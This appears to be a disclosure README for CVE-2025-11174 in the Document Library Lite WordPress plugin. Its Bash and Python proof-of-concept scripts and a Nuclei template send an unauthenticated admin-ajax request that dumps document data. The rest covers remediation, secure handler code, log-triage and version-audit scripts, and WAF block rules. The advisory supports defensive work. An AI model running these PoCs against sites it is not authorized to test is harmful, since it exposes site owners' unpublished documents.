
CVE-2025-11174 PoC: WordPress plugin Document Library Lite authorization vulnerability

Associated Vulnerability
Title: WordPress plugin Document Library Lite authorization vulnerability (CVE-2025-11174)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP that lets a user set up a personal blog site on a PHP and MySQL based server. A WordPress plugin is an application plugin for that platform. Document Library Lite versions 1.1.6 and earlier contain an authorization vulnerability caused by missing nonce and capability checks, which may allow an unauthenticated attacker to retrieve unpublished document titles and content through an AJAX endpoint.
Description
Document Library Lite <= 1.1.6 - Missing Authorization to Sensitive Information Exposure | CVE-2025-11174
Readme
# CVE-2025-11174: Unauthenticated Information Disclosure in Document Library Lite WordPress Plugin

[![CVE](https://img.shields.io/badge/CVE-2025--11174-red)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11174)
[![CVSS Score](https://img.shields.io/badge/CVSS-5.3%20Medium-orange)](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator)
[![WordPress Plugin](https://img.shields.io/badge/WordPress-Plugin-blue)](https://wordpress.org/plugins/document-library-lite/)
[![CWE-862](https://img.shields.io/badge/CWE-862-critical)](https://cwe.mitre.org/data/definitions/862.html)
[![Wordfence](https://img.shields.io/badge/Disclosed-Wordfence-success)](https://www.wordfence.com/)

> **Keywords:** CVE-2025-11174, Document Library Lite vulnerability, information disclosure, WordPress security, unauthenticated AJAX exploit, WordPress plugin vulnerability, CWE-862, WordPress document plugin security, authorization bypass, WordPress CVE 2025

## Table of Contents

- [Overview](#overview)
- [Vulnerability Details](#vulnerability-details)
- [Technical Analysis](#technical-details)
- [Attack Vector](#attack-vector)
- [Proof of Concept](#proof-of-concept)
- [Remediation Guide](#remediation)
- [Detection](#detection)
- [CVSS Metrics](#cvss-v31-metrics)
- [References](#references)
- [Credits](#credits)
- [Security Contact](#contact)

## Overview

**Document Library Lite WordPress Plugin Information Disclosure Vulnerability (CVE-2025-11174)** - Security flaw allowing unauthenticated access to sensitive document data in a WordPress document library plugin.

A missing-authorization vulnerability (CVSS 5.3, Medium) was discovered in the Document Library Lite WordPress plugin that allows unauthenticated attackers to read document information that should only be available to authorized users.

**Discovered by:** Kai Aizen & Avraham Shemesh (SnailSploit)  
**Published:** November 1, 2025  
**CVSS Score:** 5.3 (Medium)  
**CWE:** CWE-862 - Missing Authorization  
**Plugin:** Document Library Lite  
**Vendor:** Barn2 Plugins  
**Attack Type:** Unauthenticated Information Disclosure  
**Required Privileges:** None (Unauthenticated Attack)

## Vulnerability Details

### Description

The Document Library Lite plugin for WordPress contains an improper authorization vulnerability in all versions up to and including 1.1.6. The plugin exposes an unauthenticated AJAX action `dll_load_posts` which returns a JSON table of document data without performing nonce or capability checks.

### Impact

This vulnerability allows unauthenticated attackers to:
- Access document metadata without authorization
- Retrieve document listings that should be restricted
- View document information intended for authenticated users only
- Enumerate documents stored in the Document Library

**Note:** The CVSS score of 5.3 (Medium severity) reflects limited information disclosure. While the vulnerability allows unauthenticated access to document data, the impact is rated as Low for confidentiality with no integrity or availability impact.

### Affected Versions

- **Vulnerable:** All versions ≤ 1.1.6
- **Patched:** Version 1.1.7 and above

### CVSS v3.1 Metrics

```
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
```

| Metric | Value |
|--------|-------|
| Attack Vector | Network (AV:N) |
| Attack Complexity | Low (AC:L) |
| Privileges Required | None (PR:N) |
| User Interaction | None (UI:N) |
| Scope | Unchanged (S:U) |
| Confidentiality | Low (C:L) |
| Integrity | None (I:N) |
| Availability | None (A:N) |

**CVSS v3.1 Breakdown:**
- **Attack Vector (AV):** Network - The vulnerability can be exploited remotely over a network
- **Attack Complexity (AC):** Low - No special conditions are required for exploitation
- **Privileges Required (PR):** None - No authentication or privileges are required
- **User Interaction (UI):** None - The exploit works without any user interaction
- **Scope (S):** Unchanged - The vulnerability only affects the vulnerable component
- **Confidentiality Impact (C):** Low - Limited information disclosure
- **Integrity Impact (I):** None - No integrity impact
- **Availability Impact (A):** None - No availability impact

## Technical Details

### Vulnerability Root Cause

The AJAX action `dll_load_posts` is registered without proper authentication or authorization checks:

```php
// Vulnerable code pattern (simplified)
add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');
```

The `wp_ajax_nopriv_` prefix indicates this action is accessible to non-authenticated users, and the callback function does not implement:
- Nonce verification
- Capability checks
- User authentication validation

### Attack Vector

```
POST /wp-admin/admin-ajax.php
action=dll_load_posts
```

The vulnerability can be exploited through the WordPress admin-ajax.php endpoint without authentication.

## Proof of Concept

⚠️ **For Educational and Authorized Testing Purposes Only**

### Bash PoC

```bash
#!/bin/bash
# CVE-2025-11174 PoC

TARGET_URL="$1"

if [ -z "$TARGET_URL" ]; then
    echo "Usage: $0 <target_url>"
    echo "Example: $0 https://example.com"
    exit 1
fi

echo "[*] CVE-2025-11174 - Document Library Lite Information Disclosure PoC"
echo "[*] Target: $TARGET_URL"
echo ""

# Send request to vulnerable AJAX endpoint
curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "action=dll_load_posts" \
  | python3 -m json.tool

echo ""
echo "[+] If you see document data above, the site is vulnerable!"
```

### Python PoC

```python
#!/usr/bin/env python3
"""
CVE-2025-11174 - Document Library Lite Information Disclosure PoC
For educational and authorized testing purposes only
"""

import requests
import sys
import json

def exploit(target_url):
    ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    
    print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
    print(f"[*] Target: {target_url}")
    print(f"[*] AJAX Endpoint: {ajax_url}\n")
    
    data = {'action': 'dll_load_posts'}
    
    try:
        response = requests.post(ajax_url, data=data, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request successful!\n")
            try:
                json_data = response.json()
                print("[+] Retrieved document data:")
                print(json.dumps(json_data, indent=2))
                print("\n[!] Site is VULNERABLE to CVE-2025-11174")
            except ValueError:  # requests raises its own JSONDecodeError, a ValueError subclass
                print("[-] No JSON response received")
                print(f"Response: {response.text[:200]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except requests.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        print(f"Example: {sys.argv[0]} https://example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit(target)
```

## Remediation

### For Site Administrators

**Immediate Action Required:**

1. Update to Document Library Lite version **1.1.7** or later immediately
2. Review your site's access logs for suspicious POST requests to `admin-ajax.php` with `action=dll_load_posts`
3. If you cannot update immediately, consider temporarily disabling the plugin
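The log review in step 2 can be scripted. The following is an added example, not part of the PoC repository: it parses Apache/Nginx "combined" format lines, reports every POST to `admin-ajax.php` whose query string names `dll_load_posts`, and separately lists clients that hammer `admin-ajax.php` with many successful POSTs, since a standard access log does not record the POST body and a body-only request (like the one the PoC sends) is invisible to the first check. The log lines are constructed; the threshold, function names and field layout are the example's own assumptions. Capturing the action reliably for body-only requests needs a WAF audit log or a custom log format that records the body.

```python
"""Triage a combined-format access log for CVE-2025-11174 probing (added example)."""
import json
import re
import sys
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Apache/Nginx "combined" format: ip ident user [ts] "METHOD target PROTO" status size "referer" "ua"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

AJAX_PATH = "/wp-admin/admin-ajax.php"
VULN_ACTION = "dll_load_posts"


def parse_line(line):
    """Return the interesting fields of one log line, or None if it does not parse."""
    m = COMBINED_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    entry["query"] = parse_qs(parts.query)
    return entry


def is_dll_probe(entry):
    """True for a POST to admin-ajax.php whose query string names the vulnerable action."""
    return (
        entry["method"] == "POST"
        and entry["path"].endswith(AJAX_PATH)
        and VULN_ACTION in entry["query"].get("action", [])
    )


def triage(lines, burst_threshold=20):
    """Scan log lines; return definite probes and noisy admin-ajax clients.

    'probes': entries whose query string names dll_load_posts (definite hits).
    'bursts': client IPs with more than burst_threshold successful POSTs to
              admin-ajax.php, which is where body-only probes would hide.
    """
    probes = []
    ajax_posts = Counter()
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        if (entry["method"] == "POST" and entry["path"].endswith(AJAX_PATH)
                and entry["status"] == "200"):
            ajax_posts[entry["ip"]] += 1
        if is_dll_probe(entry):
            probes.append({k: entry[k] for k in ("ip", "ts", "status", "ua")})
    bursts = {ip: n for ip, n in ajax_posts.items() if n > burst_threshold}
    return {"probes": probes, "bursts": bursts}


# Constructed sample lines (not real traffic); addresses are from documentation ranges.
SAMPLE_LOG = [
    '203.0.113.9 - - [02/Nov/2025:10:00:01 +0000] "POST /wp-admin/admin-ajax.php?action=dll_load_posts HTTP/1.1" 200 4321 "-" "curl/8.4.0"',
    '203.0.113.9 - - [02/Nov/2025:10:00:02 +0000] "POST /wp-admin/admin-ajax.php?action=dll_load_posts&start=25 HTTP/1.1" 200 4310 "-" "curl/8.4.0"',
    '203.0.113.9 - - [02/Nov/2025:10:00:03 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 4300 "-" "python-requests/2.32.3"',
    '198.51.100.7 - - [02/Nov/2025:10:01:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 60 "https://example.com/wp-admin/" "Mozilla/5.0"',
    '198.51.100.7 - - [02/Nov/2025:10:01:05 +0000] "GET /documents/ HTTP/1.1" 200 15000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1]) as fh:
            result = triage(fh)
    else:
        result = triage(SAMPLE_LOG, burst_threshold=2)
    print(json.dumps(result, indent=2))
```

Run it with an access log path, or with no argument to see the constructed sample; the burst threshold should be tuned to the site's normal admin-ajax traffic, because logged-in editors and the WordPress heartbeat also POST there.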

### Update Instructions

**Via WordPress Admin:**
1. Navigate to **Plugins > Installed Plugins** in WordPress admin
2. Locate "Document Library Lite"
3. Click **Update Now** to upgrade to version 1.1.7 or later
4. Verify the update was successful

**Using WP-CLI:**
```bash
wp plugin update document-library-lite
```

### For Plugin Developers

Ensure all AJAX handlers implement proper security controls. If the document table must stay visible to logged-out visitors, a `wp_ajax_nopriv_` handler can remain, but it must limit its query to published, publicly visible documents:

```php
// Example of proper AJAX security: register the handler for logged-in users only
add_action('wp_ajax_dll_load_posts', 'dll_load_posts_callback');

function dll_load_posts_callback() {
    // Verify the nonce sent in the 'nonce' field; check_ajax_referer() replies
    // with -1 (HTTP 403) and exits when the nonce is missing or invalid
    check_ajax_referer('dll_nonce', 'nonce');

    // Check capabilities: 'read' is the minimum for any logged-in user;
    // use a narrower capability if the documents are meant to be restricted
    if (!current_user_can('read')) {
        wp_send_json_error('Insufficient permissions', 403); // exits after sending
    }

    // Your secure code here; return the table data with wp_send_json_success()
}
```

## Detection

### WordPress Plugin Check

```bash
# Check if vulnerable version is installed
wp plugin list | grep -i "document-library-lite"
```
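To turn the `wp plugin list` output into a pass/fail answer, the following added example (not part of the PoC repository) reads `wp plugin list --format=json`, which emits `name`, `status`, `update` and `version` fields, and compares the installed version against 1.1.7 numerically, so that a future 1.1.10 is not misjudged by a string comparison. The inventory below is a constructed sample; the function names are the example's own.

```python
"""Audit `wp plugin list --format=json` output for a vulnerable Document Library Lite (added example)."""
import json
import re
import sys

PLUGIN_SLUG = "document-library-lite"
FIXED_IN = (1, 1, 7)  # first patched release named in the advisory


def parse_version(text):
    """Numeric tuple for a dotted version; a trailing label like '1.1.7-beta' is dropped."""
    m = re.match(r"\d+(?:\.\d+)*", text.strip())
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(part) for part in m.group(0).split("."))


def is_vulnerable(version):
    """True for every release below 1.1.7 (tuple compare, not string compare)."""
    return parse_version(version) < FIXED_IN


def audit(plugin_list_json):
    """Return a finding for Document Library Lite, or None when it is not installed.

    An inactive plugin does not register its AJAX handler, so the endpoint is not
    reachable, but the vulnerable code is still on disk and should still be updated.
    """
    for plugin in json.loads(plugin_list_json):
        if plugin.get("name") == PLUGIN_SLUG:
            return {
                "version": plugin["version"],
                "active": plugin.get("status") == "active",
                "vulnerable": is_vulnerable(plugin["version"]),
                "update_available": plugin.get("update") == "available",
            }
    return None


# Constructed sample in the shape wp-cli emits; not taken from a real site.
SAMPLE_INVENTORY = json.dumps([
    {"name": "akismet", "status": "inactive", "update": "none", "version": "5.3.3"},
    {"name": "document-library-lite", "status": "active", "update": "available", "version": "1.1.6"},
])

if __name__ == "__main__":
    # Usage: wp plugin list --format=json | python3 audit_dll.py
    raw = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_INVENTORY
    finding = audit(raw)
    if finding is None:
        print("Document Library Lite is not installed")
    else:
        state = "VULNERABLE" if finding["vulnerable"] else "patched"
        print(f"Document Library Lite {finding['version']}: {state} "
              f"(active={finding['active']}, update_available={finding['update_available']})")
```

Pipe the real inventory in with `wp plugin list --format=json | python3 audit_dll.py`; `wp plugin get document-library-lite --field=version` gives the bare version string if only that is needed.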

### Security Scanner Rules

**Nuclei Template:**
```yaml
id: CVE-2025-11174

info:
  name: Document Library Lite - Unauthenticated Information Disclosure
  author: security-research
  severity: medium
  description: Document Library Lite plugin for WordPress is vulnerable to information disclosure
  reference:
    - https://github.com/[your-repo]/CVE-2025-11174
  tags: cve,cve2025,wordpress,wp-plugin,unauth

requests:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php"
    
    body: "action=dll_load_posts"
    
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "data"
          - "recordsTotal"
        condition: and
      
      - type: status
        status:
          - 200
```

### Web Application Firewall Rules

Both rules below deny every request that carries this action, including any legitimate front-end request the plugin itself makes through it, so test them on a staging site before enforcing.

**ModSecurity Rule:**
```apache
# Chained rule: both conditions must match before the request is denied
SecRule REQUEST_URI "@contains /wp-admin/admin-ajax.php" \
    "id:1000001,phase:2,chain,t:none,t:urlDecodeUni,t:normalizePathWin,\
    log,deny,status:403,msg:'CVE-2025-11174 Exploit Attempt'"
    SecRule ARGS:action "@streq dll_load_posts" "t:none"
```

**Nginx/OpenResty Rule:**
```nginx
# $args only covers the query string; the PoC sends the action in the POST body,
# so OpenResty (lua-nginx-module) is needed to inspect the body as well
location = /wp-admin/admin-ajax.php {
    access_by_lua_block {
        local action = ngx.req.get_uri_args()["action"]
        if action == nil then
            ngx.req.read_body()
            local post = ngx.req.get_post_args()
            action = post and post["action"]
        end
        if action == "dll_load_posts" then
            return ngx.exit(ngx.HTTP_FORBIDDEN)
        end
    }
    # the existing fastcgi_pass / include directives for PHP stay here
}
```

## Timeline

- **November 1, 2025** - Vulnerability publicly disclosed
- **November 1, 2025** - CVE record published
- **November 2025** - Patch released (version 1.1.7)

## References

- [CVE-2025-11174 - CVE.org](https://www.cve.org/CVERecord?id=CVE-2025-11174)
- [GitHub Advisory Database](https://github.com/advisories/GHSA-cq4p-v24g-p55q)
- [Wordfence Intelligence](https://www.wordfence.com/threat-intel/vulnerabilities/id/2b73d48a-1f10-4e47-a18f-82a3103b72bd?source=cve)
- [WordPress Plugin Directory](https://wordpress.org/plugins/document-library-lite/)

## Credits

**Researchers:**  
- [**Avraham Shemesh**](https://www.linkedin.com/in/abeshemesh/)  
- [**Kai Aizen**](https://linkedin.com/in/kaiaizen) - [SnailSploit](https://snailsploit.com)

**Disclosure Process:** Coordinated disclosure

## Disclaimer

This information is provided for security research and defensive purposes only. Any exploitation of this vulnerability for malicious purposes is illegal and unethical. Always obtain proper authorization before testing systems you do not own.

## Contact

For questions or additional information about this vulnerability:
- **Email:** kai@owasp.com
- **Website:** [snailsploit.com](https://snailsploit.com)
- **Organization:** SnailSploit Security Research

---

*Last updated: November 2, 2025*